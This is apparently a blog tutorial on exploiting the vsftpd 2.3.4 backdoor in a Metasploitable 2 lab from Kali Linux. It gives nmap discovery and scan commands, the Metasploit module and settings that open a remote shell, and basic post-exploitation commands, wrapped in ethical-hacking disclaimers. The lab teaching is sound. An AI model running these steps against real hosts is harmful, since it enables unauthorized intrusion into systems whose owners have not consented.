Intro
In this post, Iโll show how to find, analyze, and exploit a vulnerability in vsftpd 2.3.4 (an old FTP server with a backdoor) using Kali Linux and Metasploitable 2. This tutorial is for educational purposes only and should only be used in a controlled lab environment. Never test without permission.
๐ Step 1: Find the Targetโs IP
First, we need to identify the IP address of our Metasploitable 2 machine. Run:
ip a # On Linux
ifconfig # Alternative command
On Kali, use:
nmap -sn 192.168.93.0/24
This will list all devices on the network, helping us locate Metasploitable 2 (e.g., 192.168.93.129).
๐ Step 2: Scan for Open Ports
Once we have the targetโs IP, letโs scan for open services:
nmap -sV -p- 192.168.93.129
๐น -sV: Detects service versions
๐น -p-: Scans all 65,535 ports
๐ Result: Port 21 (FTP) is open, running vsftpd 2.3.4, which is known to have a backdoor.
๐ Step 3: Exploit vsftpd 2.3.4
Now, we use Metasploit to exploit the vulnerable service:
msfconsole
Select the exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
Check the required options:
show options
Set the target IP (RHOSTS) and the target port (RPORT):
set RHOSTS 192.168.93.129
set RPORT 21
Run the exploit:
exploit
If successful, this gives us a remote shell on the target! ๐ฏ
๐ฅ๏ธ Step 4: What Can We Do With the Shell?
Now that we have access, we can: โ๏ธ List files: ls
โ๏ธ Check users: whoami
โ๏ธ Read system info: uname -a
This is a basic proof of concept (PoC) of how an attacker can exploit outdated services.
โ ๏ธ Ethical Hacking Reminder
๐น This tutorial is for educational purposes only.
๐น Always have explicit permission before testing security.
๐น Keep your systems updated to avoid these vulnerabilities.
๐ More Resources
๐ Metasploitable 2: https://sourceforge.net/projects/metasploitable/
๐ Metasploit Docs: https://docs.metasploit.com/
๐ Nmap: https://nmap.org/
Would you like to see more tutorials like this? Let me know in the comments! ๐๐